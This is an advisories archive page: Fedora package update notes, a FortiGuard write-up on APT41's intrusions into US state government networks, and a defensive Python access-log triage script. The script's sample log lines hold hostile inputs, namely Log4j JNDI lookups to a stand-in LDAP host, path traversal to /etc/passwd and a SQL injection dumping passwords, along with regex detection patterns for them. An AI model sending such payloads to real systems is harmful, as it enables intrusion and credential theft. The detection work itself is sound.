Category Archives: Advisories

linux-firmware-20220310-130.fc34

FEDORA-2022-e5c03af85e

Packages in this update:

linux-firmware-20220310-130.fc34

Update description:

Update to upstream 20220310 linux firmware release:

Update AMD cpu microcode
ath11k: add links for WCN6855 hw2.1
ath11k: WCN6855 hw2.0: add WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3
ath11k: WCN6855 hw2.0: add board-2.bin and regdb.bin
add firmware for MT7986
update firmware for MT7921 WiFi device
update firmware for mediatek bluetooth chip (MT7921)
amdgpu: update picasso/raven/raven2 VCN firmware
amdgpu: Update GPU firmwares to the 21.50 release
amdgpu: add firmware for SDMA 5.2.7 IP block
amdgpu: add firmware for PSP 13.0.8 IP block
amdgpu: add firmware for DCN 3.1.6 IP block
amdgpu: add firmware for GC 10.3.7 IP block
rtw89: 8852a: update fw to v0.13.36.0
iwlwifi: add/Update new FWs from core68-60 release
Update Intel Bluetooth FW for 7265/8260/8265/9260/9462/9560/AX2xx
Update AMD SEV firmware
Mellanox: Add new mlxsw_spectrum firmware xx.2010.1406
rtl_bt: Update RTL8852A BT USB firmware to 0xDFB7_6D7A
rtl_bt: Update RTL8822C BT USB firmware to 0x19B7_6D7D
rtl_bt: Update RTL8822C BT UART firmware to 0x15B7_6D7D
wfx: update to firmware 3.14
wfx: add antenna configuration files

linux-firmware-20220310-130.fc35

FEDORA-2022-1229886987

Packages in this update:

linux-firmware-20220310-130.fc35

Update description:

Update to upstream 20220310 linux firmware release:

Update AMD cpu microcode
ath11k: add links for WCN6855 hw2.1
ath11k: WCN6855 hw2.0: add WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3
ath11k: WCN6855 hw2.0: add board-2.bin and regdb.bin
add firmware for MT7986
update firmware for MT7921 WiFi device
update firmware for mediatek bluetooth chip (MT7921)
amdgpu: update picasso/raven/raven2 VCN firmware
amdgpu: Update GPU firmwares to the 21.50 release
amdgpu: add firmware for SDMA 5.2.7 IP block
amdgpu: add firmware for PSP 13.0.8 IP block
amdgpu: add firmware for DCN 3.1.6 IP block
amdgpu: add firmware for GC 10.3.7 IP block
rtw89: 8852a: update fw to v0.13.36.0
iwlwifi: add/Update new FWs from core68-60 release
Update Intel Bluetooth FW for 7265/8260/8265/9260/9462/9560/AX2xx
Update AMD SEV firmware
Mellanox: Add new mlxsw_spectrum firmware xx.2010.1406
rtl_bt: Update RTL8852A BT USB firmware to 0xDFB7_6D7A
rtl_bt: Update RTL8822C BT USB firmware to 0x19B7_6D7D
rtl_bt: Update RTL8822C BT UART firmware to 0x15B7_6D7D
wfx: update to firmware 3.14
wfx: add antenna configuration files

linux-firmware-20220310-130.fc36

FEDORA-2022-21cd9a78e2

Packages in this update:

linux-firmware-20220310-130.fc36

Update description:

Update to upstream 20220310 linux firmware release:

Update AMD cpu microcode
ath11k: add links for WCN6855 hw2.1
ath11k: WCN6855 hw2.0: add WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3
ath11k: WCN6855 hw2.0: add board-2.bin and regdb.bin
add firmware for MT7986
update firmware for MT7921 WiFi device
update firmware for mediatek bluetooth chip (MT7921)
amdgpu: update picasso/raven/raven2 VCN firmware
amdgpu: Update GPU firmwares to the 21.50 release
amdgpu: add firmware for SDMA 5.2.7 IP block
amdgpu: add firmware for PSP 13.0.8 IP block
amdgpu: add firmware for DCN 3.1.6 IP block
amdgpu: add firmware for GC 10.3.7 IP block
rtw89: 8852a: update fw to v0.13.36.0
iwlwifi: add/Update new FWs from core68-60 release
Update Intel Bluetooth FW for 7265/8260/8265/9260/9462/9560/AX2xx
Update AMD SEV firmware
Mellanox: Add new mlxsw_spectrum firmware xx.2010.1406
rtl_bt: Update RTL8852A BT USB firmware to 0xDFB7_6D7A
rtl_bt: Update RTL8822C BT USB firmware to 0x19B7_6D7D
rtl_bt: Update RTL8822C BT UART firmware to 0x15B7_6D7D
wfx: update to firmware 3.14
wfx: add antenna configuration files

golang-1.18~rc1-2.fc36

FEDORA-2022-17d004ed71

Packages in this update:

golang-1.18~rc1-2.fc36

Update description:

The Go 1.18 Release Candidate 1.
It also includes an additional patch that fixes an issue on armv7hl.
This patch is not part of the upstream release but is already merged upstream, so it will be dropped from the package in a future release.

Go 1.18 Release notes: https://tip.golang.org/doc/go1.18

APT41 Compromised Six U.S. State Government Networks

FortiGuard Labs is aware of a report that the threat actor APT41 compromised at least six networks belonging to U.S. state governments between May 2021 and February 2022. To gain a foothold in the victims' networks, the threat actor used several different attack vectors: exploiting vulnerable Internet-facing web applications (including directory traversal vulnerabilities), performing SQL injection, and conducting deserialization attacks. The intent of APT41 appears to be reconnaissance, though how the stolen information is to be used has not yet been determined.

Why is this Significant?

This is significant because at least six U.S. state government networks were broken into and data was exfiltrated by APT41 as recently as February 2022. In addition, a zero-day vulnerability in the USAHerds application (CVE-2021-44207) and the Log4j vulnerability (CVE-2021-44228), among others, were exploited in the attacks.

What's the Detail of the Attack?

APT41 used several different methods to break into the targeted networks. In one case, the group exploited a SQL injection vulnerability in an Internet-facing web application. In another case, the group exploited a then-unknown vulnerability (CVE-2021-44207) in USAHerds, a web application used by agriculture officials to manage animal disease control and prevention, livestock identification and movement. APT41 also reportedly started to exploit the Log4j vulnerability (CVE-2021-44228) within hours of proof-of-concept (PoC) code becoming available. Patches for both vulnerabilities are available. Once inside the victim's network, the threat actor performed reconnaissance and credential harvesting.

What is APT41?

APT41 is a threat actor that has been active since at least 2012. Also known as TA415, Double Dragon, Barium, GREF and Wicked Panda, the group reportedly performs Chinese state-sponsored espionage activities. APT41 targets organizations in multiple countries across a wide range of industries, such as telecommunications, industrial and engineering, and think tanks. In 2020, five alleged members of the group were charged by the U.S. Justice Department for hacking more than 100 companies in the United States.

What are the Tools Used by APT41?

APT41 is known to use the following tools:

ASPXSpy – web shell backdoor
BITSAdmin – Windows command-line tool for creating and managing BITS file transfers
BLACKCOFFEE – backdoor that disguises its communications as benign traffic to legitimate websites
certutil – command-line utility for manipulating certification authority (CA) data and components
China Chopper – web shell backdoor that gives the attacker remote access to the compromised network
Cobalt Strike – commercial penetration testing tool that allows users to perform a wide range of activities
Derusbi – DLL backdoor
Empire – PowerShell post-exploitation agent that provides a wide range of attack capabilities
gh0st RAT – Remote Access Trojan (RAT)
MESSAGETAP – data mining malware
Mimikatz – open-source credential dumper
njRAT – Remote Access Trojan (RAT)
PlugX – Remote Access Trojan (RAT)
PowerSploit – open-source offensive security framework that allows users to perform a wide range of activities
ROCKBOOT – bootkit
ShadowPad – backdoor
Winnti for Linux – Remote Access Trojan (RAT) for Linux
ZxShell – Remote Access Trojan (RAT)
BadPotato – open-source tool for elevating user rights to SYSTEM
DUSTPAN (aka StealthVector) – shellcode loader
DEADEYE – downloader
LOWKEY – backdoor
KEYPLUG – backdoor

What are Other Vulnerabilities Known to be Exploited by APT41?

APT41 has exploited the following vulnerabilities in the past (the list is not exhaustive):

CVE-2020-10189 (ManageEngine Desktop Central remote code execution vulnerability)
CVE-2019-19781 (directory traversal vulnerability in Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP appliances)
CVE-2019-3396 (Atlassian Confluence Widget Connector macro Velocity template injection)
CVE-2017-11882 (Microsoft Office memory corruption vulnerability)
CVE-2017-0199 (Microsoft Office/WordPad remote code execution vulnerability w/Windows API)
CVE-2015-1641 (Microsoft Office memory corruption vulnerability)
CVE-2012-0158 (MSCOMCTL.OCX remote code execution vulnerability)

Are Patches Available for those Vulnerabilities?

Yes, patches are available for all of the vulnerabilities listed above.

What is the Status of Coverage?

FortiGuard Labs has the following AV signature in place for this issue:

Apache.Log4j.Error.Log.Remote.Code.Execution

FortiGuard Labs provides the following IPS coverage against vulnerabilities exploited by APT41:

Apache.Log4j.Error.Log.Remote.Code.Execution (CVE-2021-4104, CVE-2021-45046, CVE-2021-44228)
ZOHO.ManageEngine.DC.getChartImage.Remote.Code.Execution (CVE-2020-10189)
Citrix.Application.Delivery.Controller.VPNs.Directory.Traversal (CVE-2019-19781)
Confluence.Widget.Connector.macro.Path.Traversal (CVE-2019-3396)
MS.Office.EQNEDT32.EXE.Equation.Parsing.Memory.Corruption (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802)
MS.Office.RTF.File.OLE.autolink.Code.Execution (CVE-2017-0199, CVE-2017-8570)
MS.Office.RTF.Array.Out.of.bounds.Memory.Corruption (CVE-2015-1641)
MS.Windows.MSCOMCTL.ActiveX.Control.Remote.Code.Execution (CVE-2012-0158)
MS.Windows.MSCOMCTL.ActiveX.Control.Code.Execution (CVE-2012-0158)

All network IOCs are blocked by the Web Filtering client.
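
The intrusion vectors named above (SQL injection against Internet-facing web applications, directory traversal, and Log4j JNDI lookups sprayed into logged request fields) all leave traces in ordinary web-server access logs. The Python script below is an added example for this page, not FortiGuard or Mandiant tooling and not the signatures listed under coverage: it runs simple detection heuristics over constructed sample access-log lines (the IPs, hosts and requests are made up). It undoes percent-encoding, including double encoding, before matching, and collapses the nested Log4j lookup tricks (`${lower:...}`, `${upper:...}`, `${x:-default}`) that defeat a naive `${jndi:` string match. Deserialization attacks are out of scope, since detecting them needs request-body inspection rather than access-log fields.

```python
"""Heuristic access-log triage for the web attack classes named in the advisory:
Log4j JNDI lookups, directory traversal and SQL injection.
Added example for this page; not FortiGuard or Mandiant tooling or signatures."""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx "combined" format (made-up hosts/IPs).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2022:10:01:05 +0000] "GET /search?q=${jndi:ldap://198.51.100.9:1389/a} HTTP/1.1" 200 77 "-" "curl/7.68.0"
203.0.113.8 - - [10/Mar/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 77 "-" "${${lower:j}${::-n}di:ldap://198.51.100.9:1389/b}"
203.0.113.9 - - [10/Mar/2022:10:02:11 +0000] "GET /static/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2022:10:02:30 +0000] "GET /report?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 500 0 "-" "python-requests/2.25"
203.0.113.11 - - [10/Mar/2022:10:03:00 +0000] "GET /docs/%252e%252e/%252e%252e/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")        # innermost ${...}, no nesting inside
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
SQLI_RE = re.compile(
    r"(?i)\bunion\b\s+(?:all\s+)?\bselect\b"       # UNION SELECT
    r"|'\s*(?:or|and)\s+[\w']+\s*=\s*[\w']+"        # ' OR 1=1, ' OR 'a'='a
    r"|;\s*(?:drop|insert|update|delete)\b"         # stacked query
    r"|--\s*$"                                       # trailing SQL comment
)


def url_decode(s: str, max_rounds: int = 3) -> str:
    # Decode repeatedly so double encoding (%252e -> %2e -> .) is undone.
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def _resolve_lookup(m: "re.Match[str]") -> str:
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                 # keep the lookup we are hunting for
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.rsplit(":-", 1)[1]
    return m.group(0)                     # unknown lookup: leave untouched


def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j lookups from the inside out until ${jndi:...} is exposed."""
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(_resolve_lookup, s)
        if new == s:
            break
        s = new
    return s


def classify(line: str):
    """Return (client_ip, [categories]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("req").split(" ")
    target = parts[1] if len(parts) >= 2 else m.group("req")
    path, _, query = target.partition("?")
    hits = []
    # Log4Shell payloads were placed in any field the server logs: URL, Referer, User-Agent.
    for field in (target, m.group("ref"), m.group("ua")):
        if JNDI_RE.search(normalize_lookups(url_decode(field))):
            hits.append("log4j-jndi")
            break
    if TRAVERSAL_RE.search(url_decode(path)):
        hits.append("path-traversal")
    if SQLI_RE.search(url_decode(query)):
        hits.append("sql-injection")
    return m.group("ip"), hits


def scan_log(text: str):
    """Return [(ip, categories)] for every line that triggered at least one rule."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            result = classify(line)
            if result and result[1]:
                findings.append(result)
    return findings


if __name__ == "__main__":
    for ip, cats in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {', '.join(cats)}")
```

Run against a real log with `scan_log(open("access.log").read())`. The rules are deliberately loose triage heuristics, not IPS-grade signatures: expect false positives on legitimate query strings containing `--` or `'or'`, and note that a `${jndi:` string that reaches the log only proves an attempt; whether Log4j actually performed the lookup depends on the application logging that field with a vulnerable version.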